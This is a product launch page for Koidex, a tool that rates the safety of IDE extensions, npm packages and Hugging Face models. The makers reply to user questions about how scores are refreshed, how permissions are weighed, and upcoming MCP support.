Koidex
Know if a package, extension, or AI model is actually safe
644 followers
Know if a package, extension, or AI model is actually safe
644 followers
Koidex helps you answer one question fast: "Is this safe to install?". Search extensions, code packages, and AI models across VS Code, JetBrains, npm, and Hugging Face. You can also install the Koidex IDE extension for real-time background scanning in Cursor and Windsurf. Free, no setup.
elasticode
Love the “Catch of the Day” concept. How often is it refreshed, and what qualifies something to show up there?
Koidex
@nogahsenecky Thanks! 🙌
Catch of the Day refreshes daily (and we’ll occasionally push mid-day updates when something high-confidence pops). An item shows up there when it trips our highest-risk signals, for example: suspicious permission combos, obfuscation / unusual code patterns, suspicious network behavior, or strong publisher / ecosystem indicators (like lookalikes or sudden changes).
Winn
The scoring feels opinionated in a good way. How do you balance “this needs broad permissions to work” vs “this is overreaching”?
Koidex
@orenhacohen We try not to punish “power tools” just because they need broad permissions. The score is a mix of capability plus context: what permissions it asks for, whether that matches the stated functionality, and whether we see other risk signals alongside it (suspicious behavior patterns, obfuscation, unusual update/install patterns, shady publisher signals, etc.).
So broad permissions alone usually won’t tank the rating. Broad permissions + mismatched behavior/context is where it starts to look like overreach.
Software Product Management Stack
Super useful! Does it also work for MCPs?
Koidex
@n1c0 Yes! MCP support is coming next week, we’re opening early access for it.
I’ll DM you the details and get you set up :)
This is the first time I can quickly sanity check an extension without falling into a rabbit hole. Nice job. Do you update scores automatically when an extension releases a new version?
Koidex
Thanks @amit_ganzi, glad you found it useful :)
Yes, we update scores as new versions are published. Quick question: would you rather get notified only on score changes, or also on specific signals (new permissions, new network behavior, etc.)?
I installed the IDE flow in Cursor and it instantly showed a couple extensions I forgot I even had. That alone is worth it. Does it alert when an extension updates and changes behavior?
Koidex
Amazing, thanks @netta_zohar2!
We re-evaluate extensions as new versions roll out, so ratings update over time. Alerts on updates/behavior changes are next on our list. What kind of alert would be most useful for you: score change, permission change, or behavior change?
Great launch!!!!!!! This is one of those “why doesn’t this already exist” products. Curious how you detect suspicious behavior without running the code on my machine?
Koidex
Thanks @shoval_a !! 🙌 Love hearing that.
We don’t need to run anything on your machine. We analyze the listing and its code server-side and look for a mix of signals, for example: permissions/capabilities, suspicious code patterns (obfuscation, risky APIs, install/update hooks), dependency and publisher signals, and known bad indicators.
Koidex
Hey, @soluneai. Thanks for checking out. Koidex today is focused on the supply chain side: evaluating the tool you’re about to bring in (extensions right now, and MCP/agent tooling next), based on signals like capabilities/permissions, suspicious code patterns, publisher signals, and other risk indicators.
We’re not monitoring a model’s “off-spec” behavior across long sessions yet. That’s more runtime governance, and it’s a different problem space. But it’s definitely adjacent to where this all goes.
Curious, when you say “off-spec”, do you mean prompt/intent drift, unexpected external calls, or tool use that exceeds the allowed scope?